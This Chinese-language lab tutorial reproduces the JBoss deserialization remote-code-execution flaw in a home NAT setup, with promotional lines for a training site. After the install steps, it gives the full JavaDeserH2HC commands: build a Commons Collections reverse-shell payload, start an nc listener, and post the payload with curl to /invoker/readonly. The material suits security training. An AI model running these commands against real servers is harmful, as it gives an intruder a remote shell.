黑客漏洞利用知识点“JBoss反序列化漏洞”

一、环境搭建

将JBoss应用服务器安装在物理主机上(windows),通过nat方式连接vm下的kali,并将javadserh2hc工具(jboss反序列化漏洞攻击工具)安装在kali下,测试物理主机与虚拟机主机的连通性,复现jboss反序列化rce漏洞攻击过程。

喜欢我们文章的朋友请加圈子关注我们,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券!也可以加入我们的qq群251573549

二、安装JDK

JDK是Java Development Kit的缩写,即Java开发工具集。JDK是整个Java的核心,包括了Java运行环境(JRE)、Java开发工具和Java基础类库。换言之,如果要让Java程序运行,需有JDK平台的支持。

1)安装步骤

打开“JDK安装包”,双击运行“jdk-8u171-windows-x64.exe”安装程序,整个安装过程如图2所示(下面几幅图)所示:

2)安装JBoss应用服务器

JBoss是一个基于J2EE的开放源代码应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。而Tomcat服务器是一个免费的开放源代码的web应用服务器,属于轻量级应用服务器。在中小型系统和并发数不是很多的情况下陪普遍使用,是开发和调试jsp程序的首选。Tomcat服务器优点:部署简单、安全管理、易操作、集成方便、免费开源;Jboss服务器优点:免费开源、所需内存硬盘空间小、安装便捷、支持热部署、Jboss支持集群。(总结关键词:开源应用服务器、既是服务器也能管理其它服务器、支持集群管理、大型企业普遍。)

安装步骤

第一步:将“jboss-6.0.0”文件夹复制到D盘下(或者其它盘)

第二步:添加环境变量,添加整个过程

第三步:启动JBoss服务。打开命令行,在命令行下切换路径至JBoss安装路径下的bin目录下(D:\jboss-6.0.0\bin)输入命令:“run.bat -b 0.0.0.0”,回车运行

第四步:验证JBoss服务是否启动。在浏览器中输入“127.0.0.1:8080”,出现图7界面说明JBoss服务已经启动。

3)安装JavaDeserH2HC工具

将JavaDeserH2HC文件夹复制到Kali下的Home路径下

在攻击主机(Kali)下访问物理主机下的JBoss服务器

2、 JBoss 5.x-6.x反序列化RCE漏洞攻击复现

第一步:确保在Kali下能够正常访问物理主机上的JBoss应用服务器且在此路径下(/invoker/readonly)返回500状态码

第二步:在Kali下,打开终端,切换至“JavaDeserH2HC”路径下

第三步:输入“javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java”,回车,注:编译预置payload的java文件

第四步:继续输入

“java -cp .:commons-collections-3.2.1.jar

ReverseShellCommonsCollectionsHashMap 192.168.169.133:4444”,回车,如图16所示(IP地址为:Kali主机IP地址,端口号:Kali主机中未被占用的任一端口号都可。)。注:反弹shell的IP和端口。

第五步:在Kali下,重新打开一个终端,输入“nc -v -l -p 4444”

第六步:在Kali下,回到第四步的终端下,输入“curl http://192.168.169.1:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser”,回车,如图18所示(IP地址:受害JBoss应用服务器地址,端口号:受害JBoss应用服务监听端口。)。与此同时关注第五步中的终端,成功回显受害服务器shell,如图19所示。注:使用curl命令向/invoker/readonly提交payload。

发送payload至JBoss服务器

验证命令执行情况

最后喜欢我们文章的朋友请加圈子关注我们,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券!也可以加入我们的qq群251573549